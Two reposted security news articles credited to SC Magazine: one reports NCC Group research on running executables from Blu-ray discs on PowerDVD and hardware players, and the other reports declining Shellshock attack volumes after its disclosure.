Hackers can use Blu-Ray discs to breach networks.

An innocent-looking Blu-ray disc can be used by malicious actors to get a foothold in a targeted network, a researcher has warned.

According to Stephen Tomkinson of the NCC Group, both hardware and software Blu-ray players are plagued by vulnerabilities that can be leveraged to execute arbitrary files stored on the disc.

The advanced features provided by Blu-ray discs, such as dynamic menus and Web access, are built using BD-J (Blu-ray Disc Java). The specification is used to create interfaces and embedded applications called Xlets. Xlets are similar to Java applets, but they are specially designed for digital TV environments.

Xlets run in a Java VM and they use the SecurityManager class to implement security policies. Tomkinson noted that, in general, these security policies prevent discs from accessing elements outside of the virtual file system and prevent interaction with the underlying operating system.

In his tests, Tomkinson targeted PowerDVD, a popular Blu-ray player application developed by CyberLink. The researcher has found a way to disable the SecurityManager developed by CyberLink and gain access to methods that can be used to launch arbitrary executable files stored on the disc.

On systems where PowerDVD is installed, Blu-ray discs are automatically played with the application, which enables attackers to bypass autorun attack mitigations in Windows, the expert said.

As for physical Blu-ray players, the researcher used an exploit previously developed by Malcolm Stagg to get a shell on the device. From there, Tomkinson managed to come up with a way to execute arbitrary files located on the disc.

Both software and physical players can be targeted with a single disc, the researcher said. An attacker can create a disc that detects the player type and executes a malicious file specific to that platform. In order to avoid raising suspicion, a legitimate video file can be played right after the malicious files are launched.

“[The malicious] executables could be used by an attacker to provide a tunnel into the target network or to exfiltrate sensitive files, for example,” Tomkinson explained in a blog post.

The researcher has pointed out that in the case of physical Blu-ray players, an attacker needs to ensure that the device doesn’t go to sleep after the victim has stopped viewing the video. This can be achieved by intercepting the power off request and by switching off the power LED in order to avoid raising suspicion.

In an attack targeted at a corporate network, if the player is configured for Wi-Fi access, malicious actors can easily obtain Wi-Fi settings because the information is stored on the device unencrypted.

The NCC Group says it’s working with affected vendors to get the vulnerabilities fixed, but “with varying degrees of success.” Until the vulnerabilities are addressed, Tomkinson advises users not to utilize discs from untrusted sources, and disable the autoplay feature. In the case of hardware players, they should not be connected to the network or the Internet unless necessary.

Using removable media to distribute malware is not unheard of. The Equation Group, an entity that is believed to have ties to the NSA, reportedly replaced CD-ROMs sent out by the organizers of a scientific conference with ones containing malware.

(Article Taken from SC Magazine)

The Worst Of Shellshock Might Have Already Passed...

Shellshock is continuing to make waves in the digital world, but if new research is any indication, scans for the bug seem to be slowing down and attacks might have already peaked.

Attacks on domains reached its height in the days following the bug's disclosure on Sept. 24. One study by Akamai researchers found that targeted domain attacks reached a high of 8,021 only three days later. The following day, Sept. 28, those domain attacks were cut nearly in half, dropping to 4,576.

Michael Smith, CSIRT director at Akamai, attributes the drop to users scanning their own systems immediately after finding out about the bug. The tapering off could be indicative of more effective patching, or a clear assessment of affected devices already being performed. However, Smith wasn't completely sure this was the case.

“But it [the drop] also reminds me that correlation is not causation,” Smith said in an interview with SCMagazine.com. “Although it indicates that might be what's happening.”

The same was also seen in the unique payload attacks per day. On Sept. 27, the number peaked at 20,753. A day later, it was down to 15,071.

For attackers, Bash bug might have initially seemed to open up a new playing ground to explore post-Heartbleed, but in reality, vulnerable systems are difficult to find in the wild.

“It's more difficult to exploit the bash bug, but if you're successful, it can be more severe,” said Ben Feinstein, director of operation and development for the Dell SecureWorks Counter Threat Unit, in an interview with SCMagazine.com

If an exploitable device is found, attackers can execute commands, whereas with Heartbleed, a successful attack could turn over information, such as passwords or encryption keys, wrote Dennis Dwyer, senior security researcher for the Counter Threat research team, in an email correspondence with SCMagazine.com. Attackers can use recycled script, for instance, but ultimately, finding those devices proves difficult. This could become an attack deterrent.

Still, compared to Heartbleed, the level of expertise required to exploit Bash is significantly less, which could make it attractive to attackers. Some experts expect the attacks might dwindle, though.

“Potentially, people have completed their scans and learned what they wanted to learn,” Dwyer said. “There will always be threat actors out there exploiting the Bash vulnerability, and it will slowly taper off over time.”

(Article taken from SC Magazine)